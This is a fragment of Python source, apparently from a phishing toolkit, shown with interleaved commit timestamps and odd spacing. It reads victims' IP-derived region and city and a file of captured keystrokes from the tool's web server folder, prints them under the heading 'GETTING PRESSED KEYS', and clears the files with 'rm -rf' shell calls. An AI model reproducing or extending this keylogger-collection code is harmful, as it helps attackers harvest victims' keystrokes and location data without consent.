writeLog ( _ ( ' \n {0} Region: {2} \n City: {3} {1} ' ) . format ( GREEN , DEFAULT , ipinfo [ ' region ' ] , ipinfo [ ' city ' ] ) )
2018-10-29 03:49:19 +08:00
system ( ' rm -rf Server/www/ip.txt && touch Server/www/ip.txt ' )
writeLog ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
creds . close ( )
with open ( ' Server/www/KeyloggerData.txt ' ) as creds :
lines = creds . read ( ) . rstrip ( )
if len ( lines ) != 0 :
2019-01-28 06:45:33 +08:00
writeLog ( ' _______________________________ ' . format ( RED , DEFAULT ) )
2018-10-31 10:28:03 +08:00
writeLog ( _ ( ' {0} [ GETTING PRESSED KEYS ] {1} : \n {0} %s {1} ' ) . format ( GREEN , DEFAULT ) % lines )
2018-10-29 03:49:19 +08:00
system ( ' rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt ' )
2019-01-28 06:45:33 +08:00
writeLog ( ' _______________________________ ' . format ( RED , DEFAULT ) )
2018-10-29 03:49:19 +08:00
creds . close ( )
def writeLog ( ctx ) : #Writing log
if config . get ( " Settings " , " DidBackground " ) == " True " : #if didBackground == True, write
logFile . write ( ctx . replace ( RED , " " ) . replace ( WHITE , " " ) . replace ( CYAN , " " ) . replace ( GREEN , " " ) . replace ( DEFAULT , " " ) + " \n " )
print ( ctx )